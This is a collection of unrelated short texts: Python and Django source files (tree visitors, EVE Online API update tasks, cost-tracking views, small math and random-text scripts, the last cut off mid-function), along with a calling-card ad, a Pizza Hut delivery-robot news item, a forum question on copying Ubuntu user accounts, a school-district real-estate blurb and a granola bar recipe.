def visit_Prod(self, o, parent=None, *args, **kwargs):
if isinstance(parent, Prod):
projection = self.default_retval()
for n in o.children:
projection.extend(self.visit(n, parent=o, *args, **kwargs))
return [list(flatten(projection))]
else:
# Only the top level Prod, in a chain of Prods, should do the
# tensor product
projection = [self.visit(n, parent=o, *args, **kwargs) for n in o.children]
product = itertools.product(*projection)
ret = [list(flatten(i)) for i in product] or projection
return ret
def visit_Symbol(self, o, *args, **kwargs):
return [[o.symbol]] if o.symbol in self.symbols else [[]]
class EstimateFlops(Visitor):
"""
Estimate the number of floating point operations a tree performs.
Does not look inside flat blocks, and all function calls are
assumed flop free, so this probably underestimates the number of
flops performed.
Also, these are "effective" flops, since the compiler may do fancy
things.
"""
def visit_object(self, o, *args, **kwargs):
return 0
def visit_list(self, o, *args, **kwargs):
return sum(self.visit(e) for e in o)
def visit_Node(self, o, *args, **kwargs):
ops, _ = o.operands()
return sum(self.visit(op) for op in ops)
def visit_BinExpr(self, o, *args, **kwargs):
ops, _ = o.operands()
return 1 + sum(self.visit(op) for op in ops)
def visit_AVXBinOp(self, o, *args, **kwargs):
ops, _ = o.operands()
return 4 + sum(self.visit(op) for op in ops)
def visit_Assign(self, o, *args, **kwargs):
ops, _ = o.operands()
return sum(self.visit(op) for op in ops[1:])
def visit_AugmentedAssign(self, o, *args, **kwargs):
ops, _ = o.operands()
return 1 + sum(self.visit(op) for op in ops[1:])
def visit_For(self, o, *args, **kwargs):
body_flops = sum(self.visit(b) for b in o.body)
return (o.size / o.increment) * body_flops
def visit_Invert(self, o, *args, **kwargs):
ops, _ = o.operands()
n = ops[1].symbol
return n**3
def visit_Determinant1x1(self, o, *args, **kwargs):
return 1
def visit_Determinant2x2(self, o, *args, **kwargs):
return 3
def visit_Determinant3x3(self, o, *args, **kwargs):
return 14
|
The Partner calling card is a Permanent PIN phone card that provides the convenience of PIN Free Access. The easy Refill option means you require never be caught without minutes. And you get low calling prices to a lot of countries, high quality communications, Online Call History access, and the benefit of Toll Free Access Numbers. Your search for the perfect Partner ends here!
Refill phone card (add more money) anytime. Use My Account - My Permanent PINs to see Balance and Reports.
I used this card and it is indeed cheap calling card, so it will be an ideal solution for those customers who want to save, but have no desire to call less. If you have high phone bills on your mobile phone with this card you will control your costs, as minutes will be used. Afterwards, you can easily refill it.
|
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from celery import task
from django.core.cache import cache
import urllib
import json
from models import Alliance, Corporation, NewsFeed
from API import utils as handler
import eveapi
import feedparser
@task()
def update_alliance(allianceID):
"""
Updates an alliance and it's corporations from the API.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
allianceapi = api.eve.AllianceList().alliances.Get(allianceID)
if Alliance.objects.filter(id=allianceID).count():
# Alliance exists, update it
for corp in allianceapi.memberCorporations:
try:
update_corporation(corp.corporationID)
except AttributeError:
# Pass on this exception because one Russian corp has an
# unavoidable bad character in their description
pass
alliance = Alliance.objects.get(id=allianceID)
alliance.name = allianceapi.name
alliance.shortname = allianceapi.shortName
# Check to see if we have a record for the executor
if Corporation.objects.filter(id=allianceapi.executorCorpID).count():
alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
else:
# Alliance doesn't exists, add it without executor, update corps
# and then update the executor
alliance = Alliance(id=allianceapi.allianceID, name=allianceapi.name,
shortname=allianceapi.shortName, executor=None)
alliance.save()
for corp in allianceapi.memberCorporations:
try:
update_corporation(corp.corporationID)
except AttributeError:
# Fuck you, xCAPITALSx
pass
try:
# If an alliance's executor can't be processed for some reason,
# set it to None
alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
except:
alliance.executor = None
alliance.save()
@task()
def update_corporation(corpID, sync=False):
"""
Updates a corporation from the API. If it's alliance doesn't exist,
update that as well.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
# Encapsulate this in a try block because one corp has a fucked
# up character that chokes eveapi
try:
corpapi = api.corp.CorporationSheet(corporationID=corpID)
except:
raise AttributeError("Invalid Corp ID or Corp has malformed data.")
if corpapi.allianceID:
try:
alliance = Alliance.objects.get(id=corpapi.allianceID)
except:
# If the alliance doesn't exist, we start a task to add it
# and terminate this task since the alliance task will call
# it after creating the alliance object
if not sync:
update_alliance.delay(corpapi.allianceID)
return
else:
# Something is waiting and requires the corp object
# We set alliance to None and kick off the
# update_alliance task to fix it later
alliance = None
update_alliance.delay(corpapi.allianceID)
else:
alliance = None
if Corporation.objects.filter(id=corpID).count():
# Corp exists, update it
corp = Corporation.objects.get(id=corpID)
corp.member_count = corpapi.memberCount
corp.ticker = corpapi.ticker
corp.name = corpapi.corporationName
corp.alliance = alliance
corp.save()
else:
# Corp doesn't exist, create it
corp = Corporation(id=corpID, member_count=corpapi.memberCount,
name=corpapi.corporationName, alliance=alliance)
corp.save()
return corp
@task()
def update_all_alliances():
"""
Updates all corps in all alliances. This task will take a long time
to run.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
alliancelist = api.eve.AllianceList()
for alliance in alliancelist.alliances:
update_alliance(alliance.allianceID)
@task()
def cache_eve_reddit():
"""
Attempts to cache the top submissions to r/Eve.
"""
current = cache.get('reddit')
if not current:
# No reddit data is cached, grab it.
data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
cache.set('reddit', data, 120)
else:
# There is cached data, let's try to update it
data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
if 'data' in data:
# Got valid response, store it
cache.set('reddit', data, 120)
else:
# Invalid response, refresh current data
cache.set('reddit', current, 120)
@task
def update_feeds():
"""
Caches and updates RSS feeds in NewsFeeds.
"""
for feed in NewsFeed.objects.all():
try:
data = feedparser.parse(feed.url)
cache.set('feed_%s' % feed.pk, data, 7200)
feed.name = data['feed']['title']
feed.description = data['feed']['subtitle']
feed.save()
except:
# There shouldn't be any exceptions, but we want to continue
# if there are.
pass
|
Pizza Hut is to start testing food delivery using an autonomous robot made by postal giant FedEx later this year, it can be revealed.
The trials are set to take place in the US in the coming months and will see the chain use FedEx’s SameDay Bot to support existing delivery staff in a bid to improve efficiency of the delivery process.
The robot is equipped with proprietary technology that allows it to navigate unpaved surfaces, curbs, and even steps to deliver a complete door-to-door delivery experience.
In recent years, Pizza Hut has emerged as a driver of innovation in the pizza category, consistently exploring technological advances designed to improve the overall customer experience.
From introducing the first way to order pizza online in 1994, to partnering with reputable leaders in technology and delivery, the chain has remained committed to incorporating technology-based solutions to better support team members and deliver a hot, fast and reliable pizza experience for customers.
Pizza Hut said the testing would take place in select markets as soon as this summer, but it was currently awaiting final city approvals.
FedEx is also working with other retailers that are interested in utilising the technology. On average, more than 60% of merchants’ customers live within three miles of a store location, demonstrating the opportunity for what it calls “on-demand, hyper-local delivery”.
The FedEx bot is being developed in collaboration with DEKA Development & Research Corp and its founder Dean Kamen, inventor of many life-changing technologies, including the iBot Personal Mobility Device and the Segway .
Pizza Hut is a subsidiary of Yum! Brands and operates over 18,000 restaurants in more than 100 countries.
|
# coding: utf-8
from functools import partial, wraps
from django.apps import apps
from django.contrib import messages
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.core.urlresolvers import reverse, reverse_lazy
from django.db import IntegrityError, models
from django.db.transaction import atomic
from django.views.generic import TemplateView, CreateView, ListView, UpdateView, DeleteView
from django.forms.utils import ErrorList
from django.forms.formsets import formset_factory
from django.http import HttpResponseRedirect
from django.utils.safestring import mark_safe
from django.shortcuts import render
from core.models import Obras, UserExtension
from parametros.models import Periodo, FamiliaEquipo
from zweb_utils.mixins import TableFilterListView, ModalViewMixin
from zweb_utils.views import LoginAndPermissionRequiredMixin
from .models import (CostoParametro, Costo, CostoTipo, AvanceObra)
from .forms import (CostoItemForm, CostoItemFamiliaForm,
CopiaCostoForm, CostoCCForm, PeriodoCCForm, PeriodoCostoTipoForm,
CostoEquipoForm, CostoEditPorCCForm, CostoEditPorEquipoForm,
AvanceObraEditForm, CentroCostoSelectForm, AvanceObraCreateForm)
from .tables import (CostoTableGeneric, CostosByCCTotalTable,
CostosByEquipoMontoHSTable, AvanceObraTable)
from .filters import CostosFilter, AvanceObraFilter
class BaseCostosMixin(LoginAndPermissionRequiredMixin):
permission_required = 'costos.can_manage_costos'
permission_denied_message = "No posee los permisos suficientes para ingresar a esa sección"
raise_exception = True
class FormWithUserMixin(object):
def get_form_kwargs(self):
kwargs = super(FormWithUserMixin, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class CopiaCostosView(BaseCostosMixin, TemplateView):
"""
Vista para copiar costos de un periodo a otro.
"""
template_name = "frontend/costos/copiar_costos.html"
def get_context_data(self, **kwargs):
context = super(CopiaCostosView, self).get_context_data(**kwargs)
if 'copia_form' not in kwargs:
context["copia_form"] = CopiaCostoForm()
return context
def post(self, request, *args, **kwargs):
p_form = CopiaCostoForm(self.request.POST)
if p_form.is_valid():
return self.form_valid(p_form)
else:
return self.form_invalid(p_form)
def form_invalid(self, p_form):
return self.render_to_response(
self.get_context_data(copia_form=p_form))
def form_valid(self, form):
tipos = form.cleaned_data["tipo_costos"]
de_periodo= form.cleaned_data["de_periodo"]
a_periodo = form.cleaned_data["a_periodo"]
recalcular = form.cleaned_data["recalcular"]
if recalcular:
try:
des_param = CostoParametro.objects.get(periodo=a_periodo)
# ori_param = CostoParametro.objects.get(periodo=de_periodo)
except CostoParametro.DoesNotExist:
messages.add_message(self.request, messages.ERROR,
mark_safe("Asegúrese de definir los <b><a href='{}'>parámetros "
"de costos</a></b> para ambos periodos seleccionados.".format(
reverse('admin:costos_costoparametro_changelist'))))
return self.form_invalid(form)
copia_dict = dict()
for tipo_costo in tipos:
with atomic():
for obj in Costo.objects.filter(tipo_costo=tipo_costo, periodo=de_periodo):
try:
if tipo_costo not in copia_dict:
copia_dict[tipo_costo] = True
obj.pk = None
if recalcular:
obj.recalcular_valor(des_param)
obj.periodo = a_periodo
obj.clean()
obj.save()
except (IntegrityError, ValidationError):
copia_dict[tipo_costo] = False
for tipo_costo in tipos:
if tipo_costo in copia_dict:
if copia_dict[tipo_costo]:
messages.add_message(
self.request, messages.SUCCESS,
mark_safe("Se crearon ítems de <b>{}</b> para el periodo {}".format(tipo_costo.nombre, a_periodo)))
else:
messages.add_message(
self.request, messages.WARNING,
mark_safe("Hecho! Existían previamente ítems de <b>{}</b> para el periodo {}. Puede editarlos haciendo clic <a href='{}?tipo_costo={}&periodo={}'><b>acá</b></a>.".format(
tipo_costo, a_periodo, reverse('costos:costos_list'), tipo_costo.pk, a_periodo.pk)))
else:
messages.add_message(
self.request, messages.WARNING,
mark_safe("No existen ítems de <b>{}</b> para el periodo {}".format(tipo_costo, de_periodo)))
return HttpResponseRedirect(reverse('costos:copia_costos'))
class CostosList(BaseCostosMixin, TableFilterListView):
template_name = 'frontend/costos/costo_list.html'
filterset_class = CostosFilter
model = Costo
def get_filterset(self, *args, **kwargs):
"""
Solo mostramos centro de costos de la unidad de negocio del usuario
"""
fs = super(CostosList, self).get_filterset(*args, **kwargs)
fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
return fs
def get_queryset(self):
uns = UserExtension.get_unidades_negocio(self.request.user)
if uns.filter(codigo='OS').exclude(codigo='MS').exists(): # OS no tiene costos por equipos
return Costo.objects.filter(
centro_costo__in=Obras.get_centro_costos(self.request.user))
elif uns.filter(codigo='MS').exclude(codigo='OS').exists():
return Costo.objects.filter(
models.Q(centro_costo__in=Obras.get_centro_costos(self.request.user)) |
models.Q(centro_costo__isnull=True))
# otro caso
return Costo.objects.all()
def get_table_class(self, **kwargs):
if self.filterset.form.is_valid():
tipo_costo = self.filterset.form.cleaned_data["tipo_costo"]
relacionado_con = self.filterset.form.cleaned_data["relacionado_con"]
if tipo_costo:
return CostosByCCTotalTable if tipo_costo.es_por_cc else CostosByEquipoMontoHSTable
if relacionado_con:
return CostosByCCTotalTable if relacionado_con == 'cc' else CostosByEquipoMontoHSTable
return CostoTableGeneric
def get_context_data(self, **kwargs):
ctx = super(CostosList, self).get_context_data(**kwargs)
ctx["is_filtered"] = self.filterset.form.is_valid()
return ctx
class CostosAltaCC(BaseCostosMixin, TemplateView):
model = Costo
template_name = "frontend/costos/costos_cc_form.html"
def _form_class(self):
return PeriodoCCForm
def _get_formset(self):
return formset_factory(CostoCCForm, extra=0)
def get_context_data(self, **kwargs):
context = super(CostosAltaCC, self).get_context_data(**kwargs)
context["tipos_costos"] = self.get_queryset()
if "p_form" not in kwargs:
context["p_form"] = self._form_class()(self.request.user)
if "formsets" not in kwargs:
Formset = self._get_formset()
initial = [{'tipo_costo': x.pk} for x in context["tipos_costos"]]
context["formsets"] = Formset(initial=initial)
return context
def get_queryset(self, **kwargs):
return CostoTipo.objects.filter(relacionado_con='cc')
def post(self, request, *args, **kwargs):
p_form = self._form_class()(self.request.user, self.request.POST)
formsets = self._get_formset()(self.request.POST)
if p_form.is_valid() and formsets.is_valid():
return self.form_valid(p_form, formsets)
else:
return self.form_invalid(p_form, formsets)
def form_invalid(self, p_form, formsets):
return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))
def form_valid(self, p_form, formsets):
has_error = False
periodo = p_form.cleaned_data["periodo"]
centro_costo = p_form.cleaned_data["centro_costo"]
saved_count = 0
try:
with atomic():
for f in formsets:
if f.cleaned_data["monto_total"]:
tipo_costo = f.cleaned_data["tipo_costo"]
if self.model.objects.filter(
periodo=periodo, centro_costo=centro_costo, tipo_costo=tipo_costo).exists():
errors = f._errors.setdefault("monto_total", ErrorList())
errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
has_error = True
else:
costo = self.model(**f.cleaned_data)
costo.centro_costo = centro_costo
costo.periodo = periodo
costo.save()
saved_count += 1
if has_error:
raise IntegrityError
except IntegrityError:
return self.form_invalid(p_form, formsets)
return self.response_result(p_form, formsets, saved_count)
def response_result(self, p_form, formsets, saved_count):
if saved_count:
messages.add_message(
self.request, messages.SUCCESS,
"Se añadieron correctamente {} costos al centro de costos '{}' para el periodo '{}'".format(
saved_count, p_form.cleaned_data["centro_costo"], p_form.cleaned_data["periodo"]))
return HttpResponseRedirect(reverse('costos:costos_alta_cc'))
else:
messages.add_message(self.request, messages.WARNING, "No íngresó valores de costos")
return self.form_invalid(p_form, formsets)
class CostosAltaEquipos(BaseCostosMixin, TemplateView):
template_name = "frontend/costos/costos_eq_form.html"
form_class = CostoItemForm
model = Costo
def _form_class(self):
return PeriodoCostoTipoForm
def _get_formset(self):
return formset_factory(CostoEquipoForm, extra=0)
def get_context_data(self, **kwargs):
context = super(CostosAltaEquipos, self).get_context_data(**kwargs)
context["familias"] = self.get_queryset()
if "p_form" not in kwargs:
context["p_form"] = self._form_class()()
if "formsets" not in kwargs:
Formset = self._get_formset()
initial = [{'familia_equipo': x.pk} for x in context["familias"]]
context["formsets"] = Formset(initial=initial)
return context
def get_queryset(self, **kwargs):
return FamiliaEquipo.objects.all()
def post(self, request, *args, **kwargs):
p_form = self._form_class()(self.request.POST)
formsets = self._get_formset()(self.request.POST)
if p_form.is_valid() and formsets.is_valid():
return self.form_valid(p_form, formsets)
else:
return self.form_invalid(p_form, formsets)
def form_invalid(self, p_form, formsets):
return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))
def form_valid(self, p_form, formsets):
has_error = False
periodo = p_form.cleaned_data["periodo"]
tipo_costo = p_form.cleaned_data["tipo_costo"]
saved_count = 0
try:
with atomic():
for f in formsets:
if f.cleaned_data["monto_hora"] or f.cleaned_data["monto_mes"] or f.cleaned_data["monto_anio"]:
familia = f.cleaned_data["familia_equipo"]
if self.model.objects.filter(
periodo=periodo, familia_equipo=familia, tipo_costo=tipo_costo).exists():
errors = f._errors.setdefault("monto_hora", ErrorList())
errors.append(u"Ya existe un valor para el periodo y familia de equipos seleccionado.")
has_error = True
else:
costo = self.model(**f.cleaned_data)
costo.tipo_costo = tipo_costo
costo.periodo = periodo
costo.save()
saved_count += 1
if has_error:
raise IntegrityError
except CostoParametro.DoesNotExist:
messages.add_message(
self.request, messages.ERROR,
mark_safe("No están definidos los <a href='{}'>parámetros de costos</a> para el "
"periodo {}".format(reverse('admin:costos_costoparametro_changelist'), periodo)))
return self.form_invalid(p_form, formsets)
except IntegrityError:
return self.form_invalid(p_form, formsets)
return self.response_result(p_form, formsets, saved_count)
def response_result(self, p_form, formsets, saved_count):
if saved_count:
messages.add_message(
self.request, messages.SUCCESS,
"Se añadieron correctamente {} costos del tipo '{}' para el periodo '{}'".format(
saved_count, p_form.cleaned_data["tipo_costo"], p_form.cleaned_data["periodo"]))
return HttpResponseRedirect(reverse('costos:costos_alta_eq'))
else:
messages.add_message(self.request, messages.WARNING, "No íngresó valores de costos")
return self.form_invalid(p_form, formsets)
class CargarCostosSelectView(BaseCostosMixin, TemplateView):
template_name = 'frontend/costos/modal/cargar_costos_select.html'
class EditarCostosView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
model = Costo
def get_form_class(self, **kwargs):
return CostoEditPorCCForm if self.object.tipo_costo.es_por_cc else CostoEditPorEquipoForm
def get_url_post_form(self):
return reverse_lazy('costos:costos_edit', args=(self.object.pk, ))
def get_context_data(self, *args, **kwargs):
ctx = super(EditarCostosView, self).get_context_data(*args, **kwargs)
ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
return ctx
def form_valid(self, form):
obj = form.save()
return render(self.request, 'modal_success.html', {'obj': obj})
class EliminarCostosView(BaseCostosMixin, ModalViewMixin, DeleteView):
# http_method_names = ["post", ]
model = Costo
template_name = "modal_delete_form.html"
def get_url_post_form(self):
return reverse_lazy('costos:costos_delete', args=(self.object.pk, ))
def post(self, *args, **kwargs):
obj = self.get_object()
obj.delete()
return render(self.request, 'modal_delete_success.html', {'obj': obj})
##################
# AVANCE DE OBRA #
##################
class AvanceObraList(BaseCostosMixin, TableFilterListView):
template_name = 'frontend/costos/avance_obra_list.html'
filterset_class = AvanceObraFilter
model = AvanceObra
table_class = AvanceObraTable
def get_filterset(self, *args, **kwargs):
"""
Solo mostramos centro de costos de la unidad de negocio del usuario
"""
fs = super(AvanceObraList, self).get_filterset(*args, **kwargs)
fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
return fs
def get_context_data(self, **kwargs):
ctx = super(AvanceObraList, self).get_context_data(**kwargs)
ctx["is_filtered"] = self.filterset.form.is_valid()
return ctx
def get_queryset(self):
return self.model.objects.filter(
centro_costo__in=Obras.get_centro_costos(self.request.user))
class AvanceObraEditView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
model = AvanceObra
form_class = AvanceObraEditForm
def get_url_post_form(self):
return reverse_lazy('costos:avances_obra_edit', args=(self.object.pk, ))
def get_context_data(self, *args, **kwargs):
ctx = super(AvanceObraEditView, self).get_context_data(*args, **kwargs)
ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
return ctx
def form_valid(self, form):
obj = form.save()
return render(self.request, 'modal_success.html', {'obj': obj})
class AvanceObraDeleteView(BaseCostosMixin, ModalViewMixin, DeleteView):
model = AvanceObra
template_name = "modal_delete_form.html"
def get_url_post_form(self):
return reverse_lazy('costos:avances_obra_delete', args=(self.object.pk, ))
def post(self, *args, **kwargs):
obj = self.get_object()
obj.delete()
return render(self.request, 'modal_delete_success.html', {'obj': obj})
class AvanceObraCreateView(BaseCostosMixin, TemplateView):
model = AvanceObra
template_name = "frontend/costos/avance_obra_create.html"
form_class = CentroCostoSelectForm
formset_avance = formset_factory(AvanceObraCreateForm, extra=0, min_num=1, can_delete=True, validate_min=True)
def get_context_data(self, **kwargs):
context = super(AvanceObraCreateView, self).get_context_data(**kwargs)
forms = {
"obra_form": CentroCostoSelectForm(user=self.request.user, prefix='obra_form'),
"avances_formset": self.formset_avance(prefix='avances_formset'),
}
forms.update(context)
return forms
def post(self, request, *args, **kwargs):
obra_form = CentroCostoSelectForm(user=self.request.user, data=self.request.POST, prefix='obra_form')
avances_formset = self.formset_avance(self.request.POST, prefix='avances_formset')
if obra_form.is_valid() and avances_formset.is_valid():
return self.form_valid(obra_form, avances_formset)
else:
return self.form_invalid(obra_form, avances_formset)
def form_invalid(self, obra_form, avances_formset):
return self.render_to_response(self.get_context_data(obra_form=obra_form, avances_formset=avances_formset))
def form_valid(self, obra_form, avances_formset):
has_error = False
centro_costo = obra_form.cleaned_data["centro_costo"]
try:
with atomic():
for f in avances_formset.forms:
if f in avances_formset.deleted_forms:
continue
if self.model.objects.filter(
periodo=f.cleaned_data["periodo"], centro_costo=centro_costo).exists():
errors = f._errors.setdefault("avance", ErrorList())
errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
has_error = True
else:
f.save(centro_costo)
if has_error:
raise IntegrityError
except IntegrityError:
return self.form_invalid(obra_form, avances_formset)
return HttpResponseRedirect(self.get_success_url(centro_costo))
def get_success_url(self, centro_costo):
messages.success(self.request, "Avances de {} guardados correctamente.".format(centro_costo))
return reverse_lazy('costos:avances_obra_list')
costos_list = CostosList.as_view()
copia_costos = CopiaCostosView.as_view()
costos_alta_cc = CostosAltaCC.as_view()
costos_alta_eq = CostosAltaEquipos.as_view()
costos_select = CargarCostosSelectView.as_view()
costos_edit = EditarCostosView.as_view()
costos_delete = EliminarCostosView.as_view()
avances_obra_list = AvanceObraList.as_view()
avances_obra_edit = AvanceObraEditView.as_view()
avances_obra_delete = AvanceObraDeleteView.as_view()
avances_obra_create = AvanceObraCreateView.as_view()
|
Is there a way to copy user list (with data and passwords) from one server to another.
We have two servers and one of those is new. I need to create same users (that exist in /home/) and set same passwords (if possible) sure /home/ dir will be copied also for the configs.
To be specific its Ubuntu server 10.04.1.
Not the answer you're looking for? Browse other questions tagged linux ubuntu user-management copy or ask your own question.
What are some of the pitfalls of reusing a user name in Ubuntu?
|
#!/usr/bin/env python
"""
This file is used as a module in shortest_path.py
"""
from __future__ import absolute_import
from __future__ import print_function
import re
import sys
#import random as rnd
import numpy as np
import fileinput
from six.moves import range
from six.moves import zip
def lca_table_print_matrix(M,labels,item_width=1):
for i in labels:
for j in labels:
if (i, j) in M:
print("%*s" % (item_width,repr(M[(str(i), str(j))])), end=' ')
else:
print("%*s" % (item_width,"."), end=' ')
print()
def tree_from_file(file_name):
M = None
# Note, zip makes a list sized to the smaller sequence
i = 0
for line in fileinput.input(file_name):
vs = re.split(' +', line)
if i == 0:
numverts = len(vs)
M = np.zeros( (numverts + 1, numverts) )
for (v,j) in zip(vs,range(0,numverts)):
try:
k = float(v)
except Exception:
k = float('+inf')
if i == j:
k = 0
M[i,j] = k
i += 1
return M
def apsp(M):
nv = M.shape[1]
for level in range(1,nv+1):
for i in range(0,nv):
for j in range(0,nv):
level_i = min(nv-1,level) # min(4,level) # why the hell is this 4??
if (M[i, level_i] + M[level_i, j] < M[i,j]):
M[i,j] = M[i, level_i] + M[level_i, j]
if __name__ == '__main__':
M = tree_from_file(sys.argv[1])
apsp(M)
numverts=M.shape[1]
for i in range(0,numverts):
for j in range(0,numverts):
print(str(int(M[i,j])) + " ", end=' ')
print()
|
When you are relocating to our area of the High Country you'll want to have a clear understanding of the school system which serves the region. Here we've provided helpful contact information to make the transfer of records and other important documents easier.
The Avery County schools are phenomenal schools and each maintains a close knit atmosphere with teachers, students and parents working together. The school system is comprised of 9 schools consisting of 6 elementary schools, 2 middle schools and 1 high school. There are 2,410 students within the Avery district and 204 teachers providing smaller class sizes to optimize each child's learning potential. Please see the list of schools below for more information on where your child might be attending.
There are also a few private schools and academies in the area that offer different curriculums and instruction. Let us help you find homes and land with stunning views that span for miles and miles. If you are thinking of relocating to the mountains, take a look at our NC Mountain Property listings and contact us today!
|
# DESCRIPTION
# Prints N variants of constructed random character sets (hard-coded but hackable: block
# characters), at X characters across and Y lines down each. Prints to either terminal or
# files; hack the global variable SAVE_TO_RND_FILENAMES to alter that; hack the other globals
# also for whatever other purposes you might have.
# SEE ALSO randomNSetChars.pde.
# DEPENDENCIES
# Python 3.8 (or maybe any 3.x version) with random and time modules installed. Moreover, python may need to be compiled with UCS2 or UCS4 support (larger text code pages support).
# USAGE
# Run from a python interpreter:
# python /path/to_this_script/randomNsetChars.py
# To pipe what is printed to a file, run for example:
# python /path/to_this_script/randomNsetChars.py > 1000000_randomNsetCharsVariants.txt
# NOTES
# - Hard-coded defaults print 1,000,000 rnd character set variations. So be prepared for a lot of noise.
# - Hack the global variables (under the GLOBALS comment) for your purposes if you wish.
# CODE
import random
from time import sleep
# GLOBALS
# Seeds rando number generator via current time:
random.seed(None, 2)
# OR you can seed with a specific number, e.g.:
# random.seed(5, 2)
# -- and it will always produce the same output, in that case.
CHARSET = "▀▁▂▃▄▅▆▇█▉▊▋▌▍▎▏▐░▒▓▔▕▖▗▘▙▚▛▜▝▞▟■"
CHOOSE_RND_SUBSET = True
SAVE_TO_RND_FILENAMES = False
# REFERENCE: 1,000 ms = 1 second:
VARIANTS_TO_GENERATE = 1000000
CHARS_PER_LINE = 80
LINES_PER_GENERATED_SET = 16 # Also try e.g. 2
# The following is note used in the script if SAVE_TO_RND_FILENAMES is True:
WAIT_BETWEEN_LINES_MS = 142 # some oft-used choices: 82, 142
# DERIVATIVE VALUES SET FROM GLOBALS:
SLEEP_TIME = WAIT_BETWEEN_LINES_MS * 0.001
# Function intended use: if a controlling boolean is true, gets and
# returns a unique subset of characters from string CHARSET_STRING_PARAM;
# otherwise returns the string unmodified:
def get_charset_subset(CHARSET_STRING_PARAM):
if (CHOOSE_RND_SUBSET == True):
subset_select_percent = random.uniform(0.04,0.31)
loc_operative_charset_len = len(CHARSET_STRING_PARAM)
num_chars_in_subset = int(loc_operative_charset_len * subset_select_percent)
# If that ends up being less than two, set it to two:
if (num_chars_in_subset < 2):
num_chars_in_subset = 2
counter = 0
tmp_string = ""
while counter < num_chars_in_subset:
chosen_char = CHARSET[random.randrange(0, loc_operative_charset_len)]
if chosen_char not in tmp_string:
tmp_string += chosen_char
counter += 1
return tmp_string
else:
return CHARSET_STRING_PARAM
def get_rnd_save_file_name():
file_name_char_space = "abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789"
char_space_len = len(file_name_char_space)
file_name_str = ""
for i in range(19):
file_name_str += file_name_char_space[random.randrange(0, char_space_len)]
return file_name_str
n_set_outputs_counter = 0
digits_to_pad_file_numbers_to = len(str(VARIANTS_TO_GENERATE))
while n_set_outputs_counter < VARIANTS_TO_GENERATE:
n_set_outputs_counter += 1
# To collect character noise block sample for saving to file (not only for
# printing to screen) ; there's a trivial performance penalty here if we don't use this str:
super_string = ""
operative_charset = get_charset_subset(CHARSET)
operative_charset_len = len(operative_charset)
lines_counter = 0
while lines_counter < LINES_PER_GENERATED_SET:
rnd_string = ""
char_counter = 0
while char_counter < CHARS_PER_LINE:
rnd_string += operative_charset[random.randrange(0, operative_charset_len)]
char_counter += 1
# Only print rnd block chars to terminal if we're not saving files; otherwise,
# collect them in super_string:
if (SAVE_TO_RND_FILENAMES == False):
print(rnd_string)
sleep(SLEEP_TIME)
else:
super_string += rnd_string + "\n"
lines_counter += 1
# If a boolean says to save the collected rnd chars to a file, do so:
if (SAVE_TO_RND_FILENAMES == True):
save_file_name = get_rnd_save_file_name()
# get number padded to number of zeros to align numbers to VARIANTS_TO_GENERATE,
# for file name; therefore convert n_set_outputs_counter to string for zfill function:
str_n_set_outputs_counter = str(n_set_outputs_counter)
file_number_zero_padded = str_n_set_outputs_counter.zfill(digits_to_pad_file_numbers_to)
file = open(file_number_zero_padded + "__" + save_file_name + '.txt', "w")
file.write(super_string)
file.close()
# print("DONE creating variant", n_set_outputs_counter, "in run.")
|
Granola Bars – everything for a good nights sleep….
Home Gym Granola Bars – everything for a good nights sleep….
In my post Sleep and Performance, I talked about different pattens of sleep and how important sleep is to performance and in last weeks post Sleep Nutrition, I linked a nights good sleep to good nutrition. This granola bar recipe was originally adapted as a sports energy bar but contains many ingredients that have been associated with benefits in sleep research. Great with milk or yoghurt at breakfast, before an afternoon match or training session or even after an evening game.
Pre-heat oven to 180 degree C. Line shallow flat sided baking tray with parchment paper.
In a large town, mix together the oats, brown sugar, wheat germ, cinnamon, flour and salt. Make a crater in the middle and add in honey, egg, oil and vanilla. Mix well.
Add cherries, almonds, mixed nuts and berries and chocolate if you are adding any.
Tip into prepared baking tray and pat down evenly.
Bake for 30-35 minutes in preheated owen until bars begin to turn golden around the edges. Cut in tin when still hot from the oven but then allow to cool completely before tipping them out.
|
import sys
import math
def produce_size_strings(begin, end, base=2, n_dims=3):
""" function that produces 3D grid sizes in power-of-2 manner
example: produce_size_strings(4, 6):
16x16x16
32x16x16
32x32x16
32x32x32
64x32x32
64x64x32
64x64x64
"""
value = []
if begin > end:
print "unable to produce strings between %i and %i" % (begin, end)
return value
cardinals_exponents = range(begin, end)
cardinals = [str(int(math.pow(base, c))) for c in cardinals_exponents]
start_size = "x".join([cardinals[0]]*n_dims)
value.append(start_size)
end_size = "x".join([cardinals[-1]]*n_dims)
cardinal_idx = 1
while (start_size != end_size) and (cardinal_idx < len(cardinals)):
previous = start_size
temp_li = start_size.split("x")
for it in temp_li:
if (it == cardinals[cardinal_idx-1]):
temp_li[temp_li.index(it)] = cardinals[cardinal_idx]
break
start_size = "x".join(temp_li)
if previous != start_size:
